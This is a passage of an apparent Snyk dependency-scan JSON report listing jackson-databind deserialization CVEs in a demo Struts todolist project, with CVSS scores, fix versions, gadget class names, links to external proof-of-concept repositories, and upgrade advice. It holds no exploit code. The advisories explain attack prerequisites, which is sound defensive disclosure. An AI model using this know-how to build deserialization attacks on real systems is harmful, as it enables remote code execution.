}, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - 
"version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2660", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVE's Blog" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-10673", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.907430Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:14.029596Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:50.167932Z" - } - ], - "description": 
"## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10673" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - 
"GHSA-fqwf-pjwf-7vqv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T14:36:02.644920Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:21Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.167932Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", - "title": "GitHub Commit (Master)" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2659", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "On Jackson CVEs: Don’t Panic" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:35.299190Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.975313Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:53.920721Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the 
general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. 
Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81511", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10672" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-95cm-88f5-f2c7" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-19T15:03:20.847507Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-18T22:56:24Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-18T22:56:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.920721Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.7.9.7)", - "[2.8.0,2.8.11.6)", - "[2.9.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.7.9.7", - "2.8.11.6", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": 
{ - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2642", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to 
Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - 
"severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - 
"packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": 
